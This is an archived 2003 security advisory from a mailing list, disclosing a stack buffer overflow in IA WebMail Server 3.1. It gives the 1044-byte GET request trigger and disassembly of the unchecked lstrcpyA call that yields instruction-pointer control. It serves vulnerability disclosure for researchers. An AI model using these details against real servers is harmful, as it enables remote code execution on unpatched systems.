[NT] IA WebMail Server Buffer Overflow Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 11/04/03
- Previous message: SecuriTeam: "[NT] VMware GSX Server Remote Buffer Overflow (GLOBAL)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 4 Nov 2003 11:44:30 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
IA WebMail Server Buffer Overflow Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.tnsoft.com> IA WebMail Server combined with the IA
eMailServer is "a powerful combination for remote access. The IA WebMail
Server will work with any standard Web browser to allow users access to
their email from anywhere on the Internet. Most mail client programs
require that they be reconfigured each time they are used by a different
user. This feature is a definite boon to any user who travels or works
from outside the office on occasion".
The WebMail Server contains a buffer overflow in the HTTP GET request
headers. If a page of 1044 bytes is requested, a saved return address on
the stack is completely overwritten, and the instruction pointer can be
fully controlled upon the execution of a 'retn' instruction. It is also
possible to gain control of the ECX register during the process.
DETAILS
Vulnerable systems:
* IA WebMail Server version 3.1
Vulnerable code:
This section is added for researchers, to give them a head start in
locating the vulnerable function. The overflow is caused by an unchecked
call to lstrcpya().
A call is made from 0x0041B98C to 0x0041D850, and the saved return address
0x0041B991 is placed on the stack.
:0041B98A 8BCE mov ecx, esi
:0041B98C E8BF1E0000 call 0041D850
In the sub procedure (0x0041D850), at 0x0041D8BB a pointer to a jmp
strcpy() type instruction is located.
:0041D8BB 8B2DCCA04200 mov ebp, dword ptr [0042A0CC] ; <-
lstrcpya()
:0041D8C1 40 inc eax
:0041D8C2 8D4C2430 lea ecx, dword ptr [esp+30]
:0041D8C6 50 push eax ; <- User supplied data
:0041D8C7 51 push ecx ; <- Unchecked buffer
:0041D8C8 FFD5 call ebp ; <- Call strcpy()
At this point, the saved return address has been overwritten, and we are
just waiting for the following return instruction.
* Reference To: MFC42.Ordinal:0320, Ord:0320h
:0041DC45 E8F2830000 Call 0042603C
:0041DC4A 8B8C2434040000 mov ecx, dword ptr [esp+00000434]
:0041DC51 5F pop edi
:0041DC52 5E pop esi
:0041DC53 5D pop ebp
:0041DC54 33C0 xor eax, eax
:0041DC56 64890D00000000 mov dword ptr fs:[00000000], ecx
:0041DC5D 5B pop ebx
:0041DC5E 81C430040000 add esp, 00000430
:0041DC64 C3 ret ; <- Here we gain control of the EIP
The altered saved return address is pop'ed off the stack instead of the
real saved return address.
ADDITIONAL INFORMATION
The original advisory can be found at:
<http://www.elitehaven.net/iawebmail.txt>
http://www.elitehaven.net/iawebmail.txt.
The information has been provided by <mailto:peter4020@hotmail.com> Peter
Winter-Smith.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] VMware GSX Server Remote Buffer Overflow (GLOBAL)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] Cross Application Scripting in Trend Micros Antivirus Software
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The SecuriTeam alerts
list - Free, Accurate, Independent. ... When the product alerts the user of a possible virus,
it creates an HTML ... (Securiteam) - [NT] Microsoft Windows NTFS Improper Handler Closing
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... from a system
shutdown, uninitialized data may be visible in files from ... (Securiteam) - [TOOL] tcpstatflow - Covert Tunnel Detector
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... For example, he could set
up a SSH server on the Internet, listening port ... one way and the opposite (within a
single TCP connection). ... (Securiteam) - [EXPL] Eudora Attachment Spoof Exploit Revisited
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... present in the newest release
of Eudora. ... Can be exploited if there is more than one way into attach: in my setup
... (Securiteam) - [UNIX] Phorum SQL Injection (userlogin.php)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... An SQL injection vulnerability
exists in the 'userlogin.php' script. ... the MD5 hash of the user one character at a time.
... (Securiteam)
